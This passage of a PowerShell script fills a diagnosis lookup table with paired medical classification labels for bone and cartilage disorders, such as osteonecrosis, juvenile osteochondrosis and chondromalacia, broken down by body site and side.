defect, left lower leg") + $null = $DiagnosisList.Rows.Add("Major osseous defect, lower leg","Major osseous defect, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Major osseous defect, ankle and foot","Major osseous defect, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Major osseous defect, ankle and foot","Major osseous defect, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Major osseous defect, ankle and foot","Major osseous defect, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Major osseous defect, other site","Major osseous defect, other site") + $null = $DiagnosisList.Rows.Add("Major osseous defect, multiple sites","Major osseous defect, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, upper arm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, thigh") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, lower leg") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, other site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone","Other specified disorders of bone, unspecified site") + $null = $DiagnosisList.Rows.Add("Disorder of bone, unspecified","Disorder of bone, unspecified") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere","Osteonecrosis in diseases classified elsewhere, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, shoulder","Osteonecrosis in diseases classified elsewhere, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, shoulder","Osteonecrosis in diseases classified elsewhere, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, shoulder","Osteonecrosis in diseases classified elsewhere, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, upper arm","Osteonecrosis in diseases classified elsewhere, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, upper arm","Osteonecrosis in diseases classified elsewhere, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, upper arm","Osteonecrosis in diseases classified elsewhere, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, forearm","Osteonecrosis in diseases classified elsewhere, right forearm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, forearm","Osteonecrosis in diseases classified elsewhere, left forearm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, forearm","Osteonecrosis in diseases classified elsewhere, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, hand","Osteonecrosis in diseases classified elsewhere, right hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, hand","Osteonecrosis in diseases classified elsewhere, left hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, hand","Osteonecrosis in diseases classified elsewhere, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, thigh","Osteonecrosis in diseases classified elsewhere, right thigh") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, thigh","Osteonecrosis in diseases classified elsewhere, left thigh") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, thigh","Osteonecrosis in diseases classified elsewhere, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, lower leg","Osteonecrosis in diseases classified elsewhere, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, lower leg","Osteonecrosis in diseases classified elsewhere, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, lower leg","Osteonecrosis in diseases classified elsewhere, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, ankle and foot","Osteonecrosis in diseases classified elsewhere, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, ankle and foot","Osteonecrosis in diseases classified elsewhere, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, ankle and foot","Osteonecrosis in diseases classified elsewhere, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, other site","Osteonecrosis in diseases classified elsewhere, other site") + $null = $DiagnosisList.Rows.Add("Osteonecrosis in diseases classified elsewhere, multiple sites","Osteonecrosis in diseases classified elsewhere, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases","Osteitis deformans in neoplastic diseases, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, shoulder","Osteitis deformans in neoplastic diseases, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, shoulder","Osteitis deformans in neoplastic diseases, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, shoulder","Osteitis deformans in neoplastic diseases, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, upper arm","Osteitis deformans in neoplastic diseases, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, upper arm","Osteitis deformans in neoplastic diseases, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, upper arm","Osteitis deformans in neoplastic diseases, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, forearm","Osteitis deformans in neoplastic diseases, right forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, forearm","Osteitis deformans in neoplastic diseases, left forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, forearm","Osteitis deformans in neoplastic diseases, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, hand","Osteitis deformans in neoplastic diseases, right hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, hand","Osteitis deformans in neoplastic diseases, left hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, hand","Osteitis deformans in neoplastic diseases, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, thigh","Osteitis deformans in neoplastic diseases, right thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, thigh","Osteitis deformans in neoplastic diseases, left thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, thigh","Osteitis deformans in neoplastic diseases, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, lower leg","Osteitis deformans in neoplastic diseases, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, lower leg","Osteitis deformans in neoplastic diseases, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, lower leg","Osteitis deformans in neoplastic diseases, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, ankle and foot","Osteitis deformans in neoplastic diseases, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, ankle and foot","Osteitis deformans in neoplastic diseases, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, ankle and foot","Osteitis deformans in neoplastic diseases, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, other site","Osteitis deformans in neoplastic diseases, other site") + $null = $DiagnosisList.Rows.Add("Osteitis deformans in neoplastic diseases, multiple sites","Osteitis deformans in neoplastic diseases, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere","Osteopathy in diseases classified elsewhere, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, shoulder","Osteopathy in diseases classified elsewhere, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, shoulder","Osteopathy in diseases classified elsewhere, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, shoulder","Osteopathy in diseases classified elsewhere, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, upper arm","Osteopathy in diseases classified elsewhere, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, upper arm","Osteopathy in diseases classified elsewhere, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, upper arm","Osteopathy in diseases classified elsewhere, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, forearm","Osteopathy in diseases classified elsewhere, right forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, forearm","Osteopathy in diseases classified elsewhere, left forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, forearm","Osteopathy in diseases classified elsewhere, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, hand","Osteopathy in diseases classified elsewhere, right hand") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, hand","Osteopathy in diseases classified elsewhere, left hand") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, hand","Osteopathy in diseases classified elsewhere, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, thigh","Osteopathy in diseases classified elsewhere, right thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, thigh","Osteopathy in diseases classified elsewhere, left thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, thigh","Osteopathy in diseases classified elsewhere, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, lower leg","Osteopathy in diseases classified elsewhere, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, lower leg","Osteopathy in diseases classified elsewhere, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, lower leg","Osteopathy in diseases classified elsewhere, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, ankle and foot","Osteopathy in diseases classified elsewhere, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, ankle and foot","Osteopathy in diseases classified elsewhere, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, ankle and foot","Osteopathy in diseases classified elsewhere, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, other site","Osteopathy in diseases classified elsewhere, other site") + $null = $DiagnosisList.Rows.Add("Osteopathy in diseases classified elsewhere, multiple sites","Osteopathy in diseases classified elsewhere, multiple sites") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of hip and pelvis","Juvenile osteochondrosis of pelvis") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes]","Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes], unspecified leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes]","Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes], right leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes]","Juvenile osteochondrosis of head of femur [Legg-Calve-Perthes], left leg") + $null = $DiagnosisList.Rows.Add("Coxa plana","Coxa plana, unspecified hip") + $null = $DiagnosisList.Rows.Add("Coxa plana","Coxa plana, right hip") + $null = $DiagnosisList.Rows.Add("Coxa plana","Coxa plana, left hip") + $null = $DiagnosisList.Rows.Add("Pseudocoxalgia","Pseudocoxalgia, unspecified hip") + $null = $DiagnosisList.Rows.Add("Pseudocoxalgia","Pseudocoxalgia, right hip") + $null = $DiagnosisList.Rows.Add("Pseudocoxalgia","Pseudocoxalgia, left hip") + $null = $DiagnosisList.Rows.Add("Coxa magna","Coxa magna, unspecified hip") + $null = $DiagnosisList.Rows.Add("Coxa magna","Coxa magna, right hip") + $null = $DiagnosisList.Rows.Add("Coxa magna","Coxa magna, left hip") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis of hip and pelvis","Other juvenile osteochondrosis of hip and pelvis, unspecified leg") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis of hip and pelvis","Other juvenile osteochondrosis of hip and pelvis, right leg") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis of hip and pelvis","Other juvenile osteochondrosis of hip and pelvis, left leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of hip and pelvis, unspecified","Juvenile osteochondrosis of hip and pelvis, unspecified, unspecified leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of hip and pelvis, unspecified","Juvenile osteochondrosis of hip and pelvis, unspecified, right leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of hip and pelvis, unspecified","Juvenile osteochondrosis of hip and pelvis, unspecified, left leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of humerus","Juvenile osteochondrosis of humerus, unspecified arm") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of humerus","Juvenile osteochondrosis of humerus, right arm") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of humerus","Juvenile osteochondrosis of humerus, left arm") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of radius and ulna","Juvenile osteochondrosis of radius and ulna, unspecified arm") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of radius and ulna","Juvenile osteochondrosis of radius and ulna, right arm") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of radius and ulna","Juvenile osteochondrosis of radius and ulna, left arm") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile osteochondrosis, hand","Unspecified juvenile osteochondrosis, right hand") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile osteochondrosis, hand","Unspecified juvenile osteochondrosis, left hand") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile osteochondrosis, hand","Unspecified juvenile osteochondrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of carpal lunate [Kienbock]","Osteochondrosis (juvenile) of carpal lunate [Kienbock], right hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of carpal lunate [Kienbock]","Osteochondrosis (juvenile) of carpal lunate [Kienbock], left hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of carpal lunate [Kienbock]","Osteochondrosis (juvenile) of carpal lunate [Kienbock], unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of metacarpal heads [Mauclaire]","Osteochondrosis (juvenile) of metacarpal heads [Mauclaire], right hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of metacarpal heads [Mauclaire]","Osteochondrosis (juvenile) of metacarpal heads [Mauclaire], left hand") + $null = $DiagnosisList.Rows.Add("Osteochondrosis (juvenile) of metacarpal heads [Mauclaire]","Osteochondrosis (juvenile) of metacarpal heads [Mauclaire], unspecified hand") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, hand","Other juvenile osteochondrosis, right hand") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, hand","Other juvenile osteochondrosis, left hand") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, hand","Other juvenile osteochondrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, upper limb","Other juvenile osteochondrosis, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, upper limb","Other juvenile osteochondrosis, right upper limb") + $null = $DiagnosisList.Rows.Add("Other juvenile osteochondrosis, upper limb","Other juvenile osteochondrosis, left upper limb") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of patella","Juvenile osteochondrosis of patella, unspecified knee") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of patella","Juvenile osteochondrosis of patella, right knee") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of patella","Juvenile osteochondrosis of patella, left knee") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tibia and fibula","Juvenile osteochondrosis of tibia and fibula, unspecified leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tibia and fibula","Juvenile osteochondrosis of tibia and fibula, right leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tibia and fibula","Juvenile osteochondrosis of tibia and fibula, left leg") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tarsus","Juvenile osteochondrosis of tarsus, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tarsus","Juvenile osteochondrosis of tarsus, right ankle") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of tarsus","Juvenile osteochondrosis of tarsus, left ankle") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of metatarsus","Juvenile osteochondrosis of metatarsus, unspecified foot") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of metatarsus","Juvenile osteochondrosis of metatarsus, right foot") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of metatarsus","Juvenile osteochondrosis of metatarsus, left foot") + $null = $DiagnosisList.Rows.Add("Other specified juvenile osteochondrosis","Other specified juvenile osteochondrosis") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis, unspecified","Juvenile osteochondrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified slipped upper femoral epiphysis (nontraumatic)","Unspecified slipped upper femoral epiphysis (nontraumatic), right hip") + $null = $DiagnosisList.Rows.Add("Unspecified slipped upper femoral epiphysis (nontraumatic)","Unspecified slipped upper femoral epiphysis (nontraumatic), left hip") + $null = $DiagnosisList.Rows.Add("Unspecified slipped upper femoral epiphysis (nontraumatic)","Unspecified slipped upper femoral epiphysis (nontraumatic), unspecified hip") + $null = $DiagnosisList.Rows.Add("Acute slipped upper femoral epiphysis (nontraumatic)","Acute slipped upper femoral epiphysis (nontraumatic), right hip") + $null = $DiagnosisList.Rows.Add("Acute slipped upper femoral epiphysis (nontraumatic)","Acute slipped upper femoral epiphysis (nontraumatic), left hip") + $null = $DiagnosisList.Rows.Add("Acute slipped upper femoral epiphysis (nontraumatic)","Acute slipped upper femoral epiphysis (nontraumatic), unspecified hip") + $null = $DiagnosisList.Rows.Add("Chronic slipped upper femoral epiphysis (nontraumatic)","Chronic slipped upper femoral epiphysis (nontraumatic), right hip") + $null = $DiagnosisList.Rows.Add("Chronic slipped upper femoral epiphysis (nontraumatic)","Chronic slipped upper femoral epiphysis (nontraumatic), left hip") + $null = $DiagnosisList.Rows.Add("Chronic slipped upper femoral epiphysis (nontraumatic)","Chronic slipped upper femoral epiphysis (nontraumatic), unspecified hip") + $null = $DiagnosisList.Rows.Add("Acute on chronic slipped upper femoral epiphysis (nontraumatic)","Acute on chronic slipped upper femoral epiphysis (nontraumatic), right hip") + $null = $DiagnosisList.Rows.Add("Acute on chronic slipped upper femoral epiphysis (nontraumatic)","Acute on chronic slipped upper femoral epiphysis (nontraumatic), left hip") + $null = $DiagnosisList.Rows.Add("Acute on chronic slipped upper femoral epiphysis (nontraumatic)","Acute on chronic slipped upper femoral epiphysis (nontraumatic), unspecified hip") + $null = $DiagnosisList.Rows.Add("Kienbock's disease of adults","Kienbock's disease of adults") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans","Osteochondritis dissecans of unspecified site") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of shoulder","Osteochondritis dissecans, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of shoulder","Osteochondritis dissecans, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of shoulder","Osteochondritis dissecans, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of elbow","Osteochondritis dissecans, right elbow") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of elbow","Osteochondritis dissecans, left elbow") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of elbow","Osteochondritis dissecans, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of wrist","Osteochondritis dissecans, right wrist") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of wrist","Osteochondritis dissecans, left wrist") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of wrist","Osteochondritis dissecans, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of joints of hand","Osteochondritis dissecans, joints of right hand") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of joints of hand","Osteochondritis dissecans, joints of left hand") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of joints of hand","Osteochondritis dissecans, joints of unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of hip","Osteochondritis dissecans, right hip") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of hip","Osteochondritis dissecans, left hip") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of hip","Osteochondritis dissecans, unspecified hip") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans knee","Osteochondritis dissecans, right knee") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans knee","Osteochondritis dissecans, left knee") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans knee","Osteochondritis dissecans, unspecified knee") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of ankle and joints of foot","Osteochondritis dissecans, right ankle and joints of right foot") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of ankle and joints of foot","Osteochondritis dissecans, left ankle and joints of left foot") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans of ankle and joints of foot","Osteochondritis dissecans, unspecified ankle and joints of foot") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans other site","Osteochondritis dissecans other site") + $null = $DiagnosisList.Rows.Add("Osteochondritis dissecans multiple sites","Osteochondritis dissecans multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies","Other specified osteochondropathies of unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of shoulder","Other specified osteochondropathies, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of shoulder","Other specified osteochondropathies, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of shoulder","Other specified osteochondropathies, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of upper arm","Other specified osteochondropathies, right upper arm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of upper arm","Other specified osteochondropathies, left upper arm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of upper arm","Other specified osteochondropathies, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of forearm","Other specified osteochondropathies, right forearm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of forearm","Other specified osteochondropathies, left forearm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of forearm","Other specified osteochondropathies, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of hand","Other specified osteochondropathies, right hand") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of hand","Other specified osteochondropathies, left hand") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of hand","Other specified osteochondropathies, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of thigh","Other specified osteochondropathies, right thigh") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of thigh","Other specified osteochondropathies, left thigh") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of thigh","Other specified osteochondropathies, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies lower leg","Other specified osteochondropathies, right lower leg") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies lower leg","Other specified osteochondropathies, left lower leg") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies lower leg","Other specified osteochondropathies, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of ankle and foot","Other specified osteochondropathies, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of ankle and foot","Other specified osteochondropathies, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies of ankle and foot","Other specified osteochondropathies, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies other","Other specified osteochondropathies other") + $null = $DiagnosisList.Rows.Add("Other specified osteochondropathies multiple sites","Other specified osteochondropathies multiple sites") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified","Osteochondropathy, unspecified of unspecified site") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of shoulder","Osteochondropathy, unspecified, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of shoulder","Osteochondropathy, unspecified, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of shoulder","Osteochondropathy, unspecified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of upper arm","Osteochondropathy, unspecified, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of upper arm","Osteochondropathy, unspecified, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of upper arm","Osteochondropathy, unspecified, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of forearm","Osteochondropathy, unspecified, right forearm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of forearm","Osteochondropathy, unspecified, left forearm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of forearm","Osteochondropathy, unspecified, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of hand","Osteochondropathy, unspecified, right hand") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of hand","Osteochondropathy, unspecified, left hand") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of hand","Osteochondropathy, unspecified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of thigh","Osteochondropathy, unspecified, right thigh") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of thigh","Osteochondropathy, unspecified, left thigh") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of thigh","Osteochondropathy, unspecified, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified lower leg","Osteochondropathy, unspecified, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified lower leg","Osteochondropathy, unspecified, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified lower leg","Osteochondropathy, unspecified, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of ankle and foot","Osteochondropathy, unspecified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of ankle and foot","Osteochondropathy, unspecified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified of ankle and foot","Osteochondropathy, unspecified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified other","Osteochondropathy, unspecified other") + $null = $DiagnosisList.Rows.Add("Osteochondropathy, unspecified multiple sites","Osteochondropathy, unspecified multiple sites") + $null = $DiagnosisList.Rows.Add("Other disorders of cartilage","Chondrocostal junction syndrome [Tietze]") + $null = $DiagnosisList.Rows.Add("Other disorders of cartilage","Relapsing polychondritis") + $null = $DiagnosisList.Rows.Add("Chondromalacia","Chondromalacia, unspecified site") + $null = $DiagnosisList.Rows.Add("Chondromalacia, shoulder","Chondromalacia, right shoulder") + $null = $DiagnosisList.Rows.Add("Chondromalacia, shoulder","Chondromalacia, left shoulder") + $null = $DiagnosisList.Rows.Add("Chondromalacia, shoulder","Chondromalacia, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Chondromalacia, elbow","Chondromalacia, right elbow") + $null = $DiagnosisList.Rows.Add("Chondromalacia, elbow","Chondromalacia, left elbow") + $null = $DiagnosisList.Rows.Add("Chondromalacia, elbow","Chondromalacia, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Chondromalacia, wrist","Chondromalacia, right wrist") + $null = $DiagnosisList.Rows.Add("Chondromalacia, wrist","Chondromalacia, left wrist") + $null = $DiagnosisList.Rows.Add("Chondromalacia, wrist","Chondromalacia, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Chondromalacia, joints of hand","Chondromalacia, joints of right hand") + $null = $DiagnosisList.Rows.Add("Chondromalacia, joints of hand","Chondromalacia, joints of left hand") + $null = $DiagnosisList.Rows.Add("Chondromalacia, joints of hand","Chondromalacia, joints of unspecified hand") + $null = $DiagnosisList.Rows.Add("Chondromalacia, hip","Chondromalacia, right hip") + $null = $DiagnosisList.Rows.Add("Chondromalacia, hip","Chondromalacia, left hip") + $null = $DiagnosisList.Rows.Add("Chondromalacia, hip","Chondromalacia, unspecified hip") + 